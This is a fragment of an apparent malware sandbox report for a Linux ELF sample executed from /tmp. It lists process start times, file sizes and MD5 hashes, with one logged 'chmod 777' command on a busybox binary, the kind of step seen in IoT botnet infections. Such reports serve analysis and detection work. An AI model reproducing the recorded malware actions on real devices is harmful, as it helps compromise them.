                Arguments:chmod 777 \\xff\\xecHbin/busybox
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/tmp/sduVQWDj8L.elf
                Arguments:n/a
                File size:4463432 bytes
                MD5 hash:cd177594338c77b895ae27c33f8f86cc

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/tmp/sduVQWDj8L.elf
                Arguments:n/a
                File size:4463432 bytes
                MD5 hash:cd177594338c77b895ae27c33f8f86cc

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/tmp/sduVQWDj8L.elf
                Arguments:n/a
                File size:4463432 bytes
                MD5 hash:cd177594338c77b895ae27c33f8f86cc